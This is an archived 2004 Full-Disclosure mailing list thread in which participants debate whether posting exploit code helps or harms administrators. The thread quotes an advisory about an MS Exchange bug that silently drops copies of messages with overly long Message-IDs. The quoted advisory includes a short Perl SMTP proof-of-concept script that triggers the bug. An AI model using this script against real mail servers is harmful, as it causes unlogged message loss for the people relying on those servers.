Full Disclosure mailing list archives
RE: [Full-Disclosure] RE: Full-disclosure MS Exchange message lost-so lets post how
From: "Syed Imran Ali" <manipeto () yahoo co uk>
Date: Thu, 13 May 2004 09:25:06 +0500
I agree with Randal's point of view. Dunno abt others... Although we have been discussing this exploit posting issue since long time... the latest one was cyber punk's, hmmmm .. 4 C.P : h1ya, u rem. WFD ;) sh0utS t0 U agAin. ;) Regards, S. Imran Ali -----Original Message----- From: full-disclosure-admin () lists netsys com [mailto:full-disclosure-admin () lists netsys com] On Behalf Of RandallM Sent: Thursday, May 13, 2004 6:45 AM To: full-disclosure () lists netsys com Subject: [Full-Disclosure] RE: Full-disclosure MS Exchange message lost-so lets post how I am using the following only as an example that has been slightly discussed here. The gentleman rightly posts and gives us the information that is very helpful to be aware of. But then posts the "exploit" example because, in his own words, <|>I think some people know how to use this "FEATURE" ... I hope this post <|>will speed up the fix release! Exactly in what way do you think this should speed up the release? Granted, this is a "lost" email exploit. But what if it was a dangerous exploit? I have seen these also posted. I know of "script Kiddies" who would never be able to find the exploit but are part of the group who "know how to use this 'FEATURE'...". They watch here and others just for that purpose. Where is accountability? I am torn between this issue of needed knowledge and exposed exploit. As a network Administrator I have no need for the exploit but for the knowledge. I have found no better place then here for that. Then on the other hand you all give out the exploits for confirmation which is needed also. Just some of my personal inward ramblings. thank you Randall M <|>--__--__-- <|> <|>Message: 20 <|>Date: Wed, 12 May 2004 11:52:23 +0200 (MEST) <|>From: I.D.S () gmx de <|>To: full-disclosure () lists netsys com <|>Subject: [Full-disclosure] MS Exchange message lost <|> <|>* MS Exchange duplicate message fault (message lost) <|>* <|>* MS Exchange (all versions affected) duplicate message fault <|>* <|>* I discovered this bug independently on 10, 2003 <|>* <|>* public post 05, 2004 <|>* <|>* Helmut Schmitz < i.d.s () gmx de > <|>* <|>* (c) 2003/2004 Copyright by Helmut Schmitz - HackForce.NET - */ <|> <|>MS Exchange Server (tested on 5.5 and 2003) has a bug ... If you send <|>Messages with long message ids (>189 bytes?)to more than one recipient <|>(cc), <|>the message will not delivered correctly ... there is no correct logging <|>!!, <|>the messages will be delivered to only one Recipient ... the message to <|>the <|>other will be lost !! <|> <|>I have send this issue to Microsoft (10.2003) ... some months later <|>(05.2004) I got the fix, but not public ... store.exe (6.5.6980.81) with <|>some reg settings fixes (workaround ;-) the problem. <|> <|>Perl Example (test exploit) ... <|> <|>#!/usr/bin/perl -w <|>use Net::SMTP; <|>$from = 'sender () yourdomain de'; <|>$to = 'user1 () yourdomain de'; <|>$cc = 'user2 () yourdomain de'; <|>$subject = 'Test Email'; <|>$smtp = Net::SMTP->new('yourmailserver'); <|>$smtp->mail($from); <|>$smtp->to($to); <|>$smtp->cc($cc); <|>$smtp->data(); <|>$smtp->datasend("To: <$to>\n"); <|>$smtp->datasend("Cc: <$cc>\n"); <|>$smtp->datasend("From: <$from>\n"); <|>$smtp->datasend("Subject: $subject\n"); <|>$smtp->datasend("Message-ID: <|><veryverylongmessageid123ondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhte <|>ngeifeejktmhedgedherngrondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhteng <|>eifeejktmhedgedherngrondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhtengei <|>feejktmhedgedherngrondljzhng> \n"); <|>$smtp->datasend("Hallo\n"); <|>$smtp->datasend("123\n"); <|>$smtp->datasend("123\n"); <|>$smtp->datasend("123\n"); <|>$smtp->dataend(); <|>$smtp->quit; <|> <|>Background: <|>Duplicate detection is decided by three factors. These are MessageID, <|>RootFID (the root folder ID of the mailbox) and the SubmitTime into the <|>store. These are used to build a unique key when the message is <|>submitted. <|>If all the factors are the same value, then we recognize the message as <|>duplicate. <|> <|>################################### <|> <|>I think some people know how to use this "FEATURE" ... I hope this post <|>will speed up the fix release! <|> <|>Regards, <|>Helmut Schmitz _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [Full-Disclosure] RE: Full-disclosure MS Exchange message lost-so lets post how RandallM (May 12)
- RE: [Full-Disclosure] RE: Full-disclosure MS Exchange message lost-so lets post how Syed Imran Ali (May 12)
- Re: [Full-Disclosure] RE: Full-disclosure MS Exchange message lost-so lets post how Lan Guy (May 13)
- Re: [Full-Disclosure] RE: Full-disclosure MS Exchange message lost-so lets post how Gerhard den Hollander (May 13)